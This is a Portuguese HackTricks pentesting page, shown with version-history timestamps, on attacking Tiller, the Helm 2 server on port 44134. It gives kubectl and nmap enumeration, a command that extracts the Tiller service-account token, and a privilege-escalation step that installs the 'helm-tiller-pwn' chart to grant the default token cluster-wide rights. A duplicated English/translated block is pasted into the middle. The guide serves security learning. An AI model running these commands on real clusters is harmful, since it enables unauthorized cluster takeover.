hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md

178 lines
9.6 KiB
Markdown
Raw Normal View History

2023-06-06 18:56:34 +00:00
# Informação Básica
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
Helm é o **gerenciador de pacotes** para Kubernetes. Ele permite empacotar arquivos YAML e distribuí-los em repositórios públicos e privados. Esses pacotes são chamados de **Helm Charts**. **Tiller** é o **serviço** que é executado por padrão na porta 44134 oferecendo o serviço.
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
**Porta padrão:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# Enumeração
Se você pode **enumerar pods e/ou serviços** de diferentes namespaces, enumere-os e procure pelos que possuem **"tiller" em seu nome**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
Original English text:
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
## Pentesting Tiller (Helm)
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
### Introduction
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
Helm is a package manager for Kubernetes that allows developers and operators to more easily package, configure, and deploy applications and services onto Kubernetes clusters. Helm is composed of two main components: the Helm client and the Tiller server. The Helm client is a command-line tool that allows users to interact with the Tiller server, which is responsible for managing the lifecycle of Kubernetes resources created by Helm charts.
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
### Tiller Security
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
Tiller is a privileged component of the Kubernetes cluster, with the ability to create, modify, and delete any Kubernetes resource in any namespace. As such, it is important to ensure that Tiller is properly secured to prevent unauthorized access and potential compromise of the entire cluster.
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
### Pentesting Tiller
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
#### Tiller Deployment
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
The first step in pentesting Tiller is to identify the Tiller deployment within the Kubernetes cluster. This can be done using the `kubectl` command-line tool:
```bash
$ kubectl get deployments --all-namespaces | grep tiller-deploy
kube-system tiller-deploy-5c6f9c7c7f-8q8qz 1/1 Running 0 2m
```
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
Once the Tiller deployment has been identified, the next step is to obtain the Tiller service account token. This token is used by the Helm client to authenticate with the Tiller server and issue commands.
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
#### Tiller Service Account Token
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
The Tiller service account token can be obtained using the `kubectl` command-line tool:
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
```bash
$ kubectl get secret --namespace kube-system $(kubectl get serviceaccount --namespace kube-system tiller -o jsonpath='{.secrets[0].name}') -o jsonpath='{.data.token}' | base64 --decode
2021-12-29 12:26:06 +00:00
```
2023-06-06 18:56:34 +00:00
The output of this command will be the Tiller service account token, which can be used to authenticate with the Tiller server.
#### Tiller API
Once the Tiller service account token has been obtained, the next step is to interact with the Tiller API. This can be done using the Helm client:
```bash
$ helm init --client-only
$ export TILLER_NAMESPACE=kube-system
$ helm list
2021-12-29 12:26:06 +00:00
```
2023-06-06 18:56:34 +00:00
The `helm init --client-only` command initializes the Helm client and sets the Tiller namespace to `kube-system`. The `helm list` command then lists all of the releases managed by Tiller.
#### Tiller Exploitation
With access to the Tiller API, an attacker can perform a variety of actions, including:
- Listing all of the releases managed by Tiller
- Installing new releases
- Upgrading existing releases
- Deleting releases
- Reading and modifying the Kubernetes resources managed by Tiller
To exploit Tiller, an attacker can use the Helm client to install a malicious chart that includes a backdoor or other malicious code. Once the chart has been installed, the attacker can use the Tiller API to execute the backdoor or other malicious code.
### Conclusion
Tiller is a critical component of the Helm package manager for Kubernetes, and as such, it is important to ensure that it is properly secured. Pentesting Tiller can help identify potential vulnerabilities and weaknesses in the Tiller deployment, allowing organizations to take steps to mitigate these risks.
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
Translated text:
## Pentesting Tiller (Helm)
### Introdução
O Helm é um gerenciador de pacotes para Kubernetes que permite que desenvolvedores e operadores empacotem, configurem e implantem aplicativos e serviços em clusters Kubernetes com mais facilidade. O Helm é composto por dois componentes principais: o cliente Helm e o servidor Tiller. O cliente Helm é uma ferramenta de linha de comando que permite aos usuários interagir com o servidor Tiller, que é responsável por gerenciar o ciclo de vida dos recursos Kubernetes criados pelos gráficos Helm.
### Segurança do Tiller
O Tiller é um componente privilegiado do cluster Kubernetes, com a capacidade de criar, modificar e excluir qualquer recurso Kubernetes em qualquer namespace. Como tal, é importante garantir que o Tiller esteja devidamente protegido para evitar acesso não autorizado e possível comprometimento de todo o cluster.
### Pentesting Tiller
#### Implantação do Tiller
O primeiro passo na pentesting do Tiller é identificar a implantação do Tiller dentro do cluster Kubernetes. Isso pode ser feito usando a ferramenta de linha de comando `kubectl`:
2021-12-29 12:26:06 +00:00
```bash
2023-06-06 18:56:34 +00:00
$ kubectl get deployments --all-namespaces | grep tiller-deploy
kube-system tiller-deploy-5c6f9c7c7f-8q8qz 1/1 Running 0 2m
```
Depois que a implantação do Tiller for identificada, o próximo passo é obter o token da conta de serviço do Tiller. Este token é usado pelo cliente Helm para autenticar-se com o servidor Tiller e emitir comandos.
#### Token da conta de serviço do Tiller
O token da conta de serviço do Tiller pode ser obtido usando a ferramenta de linha de comando `kubectl`:
```bash
$ kubectl get secret --namespace kube-system $(kubectl get serviceaccount --namespace kube-system tiller -o jsonpath='{.secrets[0].name}') -o jsonpath='{.data.token}' | base64 --decode
2021-12-29 12:26:06 +00:00
```
2023-06-06 18:56:34 +00:00
A saída deste comando será o token da conta de serviço do Tiller, que pode ser usado para autenticar-se com o servidor Tiller.
#### API do Tiller
Depois que o token da conta de serviço do Tiller for obtido, o próximo passo é interagir com a API do Tiller. Isso pode ser feito usando o cliente Helm:
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
```bash
$ helm init --client-only
$ export TILLER_NAMESPACE=kube-system
$ helm list
```
O comando `helm init --client-only` inicializa o cliente Helm e define o namespace do Tiller como `kube-system`. O comando `helm list` lista todos os lançamentos gerenciados pelo Tiller.
#### Exploração do Tiller
Com acesso à API do Tiller, um invasor pode realizar uma variedade de ações, incluindo:
- Listar todos os lançamentos gerenciados pelo Tiller
- Instalar novos lançamentos
- Atualizar lançamentos existentes
- Excluir lançamentos
- Ler e modificar os recursos Kubernetes gerenciados pelo Tiller
Para explorar o Tiller, um invasor pode usar o cliente Helm para instalar um gráfico malicioso que inclui uma porta dos fundos ou outro código malicioso. Depois que o gráfico for instalado, o invasor pode usar a API do Tiller para executar a porta dos fundos ou outro código malicioso.
### Conclusão
O Tiller é um componente crítico do gerenciador de pacotes Helm para Kubernetes e, como tal, é importante garantir que esteja devidamente protegido. A pentesting do Tiller pode ajudar a identificar possíveis vulnerabilidades e fraquezas na implantação do Tiller, permitindo que as organizações tomem medidas para mitigar esses riscos.
2021-12-29 12:26:06 +00:00
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
2023-06-06 18:56:34 +00:00
Você também pode tentar encontrar este serviço em execução verificando a porta 44134:
2021-12-29 12:26:06 +00:00
```bash
sudo nmap -sS -p 44134 <IP>
```
2023-06-06 18:56:34 +00:00
Depois de descobri-lo, você pode se comunicar com ele baixando o aplicativo cliente helm. Você pode usar ferramentas como `homebrew`, ou olhar [**a página oficial de lançamentos**](https://github.com/helm/helm/releases)**.** Para mais detalhes, ou para outras opções, veja [o guia de instalação](https://v2.helm.sh/docs/using\_helm/#installing-helm).
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
Então, você pode **enumerar o serviço**:
2021-12-29 12:26:06 +00:00
```
helm --host tiller-deploy.kube-system:44134 version
```
2023-06-06 18:56:34 +00:00
## Escalação de Privilégios
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
Por padrão, o **Helm2** foi instalado no **namespace kube-system** com **privilégios elevados**, portanto, se você encontrar o serviço e tiver acesso a ele, isso poderá permitir que você **elevasse seus privilégios**.
2021-12-29 12:26:06 +00:00
2023-06-06 18:56:34 +00:00
Tudo o que você precisa fazer é instalar um pacote como este: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) que dará ao **token de serviço padrão acesso a tudo no cluster inteiro**.
2021-12-29 12:26:06 +00:00
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
2023-06-06 18:56:34 +00:00
Em [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) você tem a **explicação do ataque**, mas basicamente, se você ler os arquivos [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) e [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) dentro de _helm-tiller-pwn/pwnchart/templates/_ você pode ver como **todos os privilégios estão sendo dados ao token padrão**.